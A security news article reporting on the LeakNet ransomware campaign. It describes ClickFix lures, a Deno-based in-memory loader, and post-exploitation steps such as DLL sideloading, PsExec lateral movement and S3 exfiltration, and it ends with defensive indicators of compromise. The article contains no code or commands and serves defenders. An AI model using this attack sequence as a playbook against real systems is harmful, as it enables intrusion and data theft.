March 17, 2026

LeakNet Ransomware Utilizes ClickFix and Deno Runtime for Stealthy Attacks

Vaibhav March 17, 2026
LeakNet Ransomware Utilizes ClickFix and Deno Runtime for Stealthy Attacks
Post Views: 13

LeakNet Ransomware Campaign Employs ClickFix Technique and Deno Runtime

A recently discovered ransomware campaign has been leveraging the ClickFix technique to gain initial access to corporate networks, followed by the deployment of a custom malware loader built on the Deno runtime for JavaScript and TypeScript.

ClickFix Technique and BYOR Tactic

The ClickFix technique is a social engineering attack that tricks users into executing malicious commands on their systems through fake prompts. This technique has been employed by multiple ransomware groups, including Termite and Interlock.

By using a signed and legitimate executable, the attackers can avoid detection and execute malicious code without raising suspicions. This tactic, dubbed “bring your own runtime” (BYOR) by researchers, exploits the legitimacy of the Deno runtime to bypass blocklists and filters for unknown binary execution.

Attack Chain and Post-Exploitation Phase

The attack chain involves the use of Visual Basic Script (VBS) and PowerShell scripts, named Romeo*.ps1 and Juliet*.vbs, to initiate the process. The Deno runtime is then used to execute the malicious code directly in memory, leaving minimal forensic artifacts behind.

The code fingerprints the host, generates a unique victim ID, and connects to the command-and-control (C2) server to retrieve the second-stage payload. A persistent polling loop is also established to receive new commands from the C2.

During the post-exploitation phase, LeakNet employs a range of tactics, including DLL sideloading, C2 beaconing, credential discovery via klist enumeration, lateral movement via PsExec, and payload staging and data exfiltration using Amazon S3 buckets.

Indicators of Compromise

Researchers note that the consistency and repeatability of the attack chain provide opportunities for defenders to detect potential LeakNet activity. Indicators of compromise include:

  • Deno running outside development environments
  • Suspicious misexec execution from browsers
  • Abnormal PsExec usage
  • Unexpected outbound traffic to S3
  • DLL sideloading in unusual directories



About Author

Vaibhav

See author's posts

More Stories

Enhanced AI-Powered Security with Advanced Exposure and Attack Path Visibility for Cyber Threats

Enhanced AI-Powered Security with Advanced Exposure and Attack Path Visibility for Cyber Threats

Vaibhav March 17, 2026
Enhanced AI-Powered Security: Unlocking Exposure and Attack Path Visibility with XM Cyber

Enhanced AI-Powered Security: Unlocking Exposure and Attack Path Visibility with XM Cyber

Vaibhav March 17, 2026
Real-Time Threat Response for OT Remote Access Sessions with Xona Systems

Real-Time Threat Response for OT Remote Access Sessions with Xona Systems

Vaibhav March 17, 2026

Latest Cyber Security News

Enhanced AI-Powered Security with Advanced Exposure and Attack Path Visibility for Cyber Threats

Enhanced AI-Powered Security with Advanced Exposure and Attack Path Visibility for Cyber Threats

Vaibhav March 17, 2026
Cyberattacks Surge on Banks and Fintech Companies Following Iran Conflict Escalation

Cyberattacks Surge on Banks and Fintech Companies Following Iran Conflict Escalation

Vaibhav March 17, 2026
Mac Users Warned of ClickFix Attack via Fake Claude Tools Spreading MacSync Malware

Mac Users Warned of ClickFix Attack via Fake Claude Tools Spreading MacSync Malware

Vaibhav March 17, 2026
UK Companies House Data Leak: Millions of Firms' Details Exposed

UK Companies House Data Leak: Millions of Firms’ Details Exposed

Vaibhav March 17, 2026
Enhanced AI-Powered Security: Unlocking Exposure and Attack Path Visibility with XM Cyber

Enhanced AI-Powered Security: Unlocking Exposure and Attack Path Visibility with XM Cyber

Vaibhav March 17, 2026
en_USEnglish
en_USEnglish